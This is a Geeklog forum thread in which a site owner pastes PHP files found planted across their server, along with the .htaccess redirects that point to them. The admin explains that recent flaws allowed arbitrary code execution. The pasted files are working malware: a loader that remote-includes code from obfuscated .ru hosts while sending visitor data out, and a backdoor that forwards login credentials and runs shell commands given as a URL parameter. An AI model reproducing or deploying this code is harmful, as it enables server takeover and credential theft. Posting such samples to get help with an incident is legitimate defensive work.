Welcome to Geeklog, Anonymous Saturday, December 21 2024 @ 12:00 pm EST
Geeklog Forums
hacking a family site
hacked
Anonymous
I've recently found these files strewn throughout my system dirs by various names and .htaccess files providing redirects to them from a 404 (or something like that):
first file:
second file:
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and the .htaccess file:
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php
what's up with that? how could these files have got there and what do they do? I'm deleting them as I find them. They are in a whold bunch of directories. ...and I don't have a clue how to read server logs.
first file:
Text Formatted Code
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>second file:
Text Formatted Code
<?phperror_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and the .htaccess file:
Text Formatted Code
Options -MultiViewsErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php
what's up with that? how could these files have got there and what do they do? I'm deleting them as I find them. They are in a whold bunch of directories. ...and I don't have a clue how to read server logs.
7
13
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Which Geeklog version are you on?
Unfortunately, we had a few issues recently that allowed attackers to execute arbitraty code - which means that they could do just about anything, including creating or uploading new files.
bye, Dirk
Unfortunately, we had a few issues recently that allowed attackers to execute arbitraty code - which means that they could do just about anything, including creating or uploading new files.
bye, Dirk
9
9
Quote
hacked
Anonymous
I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.
upgrade went fine by the way.
the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.
I found these files accross 3 domains, 2 subdomains, all on the same server obvoiusly, involving not only geeklog installations but 2 word press installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.
HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. the new username was also added to the database with all priveledges. wtf?!
upgrade went fine by the way.
the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.
I found these files accross 3 domains, 2 subdomains, all on the same server obvoiusly, involving not only geeklog installations but 2 word press installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.
HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. the new username was also added to the database with all priveledges. wtf?!
10
10
Quote
Status: offline
Dirk
Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Sounds really bad 
The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...
bye, Dirk
The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...
bye, Dirk
14
7
Quote
All times are EST. The time is now 12:00 pm.
- Normal Topic
- Sticky Topic
- Locked Topic
- New Post
- Sticky Topic W/ New Post
- Locked Topic W/ New Post
- View Anonymous Posts
- Able to post
- Filtered HTML Allowed
- Censored Content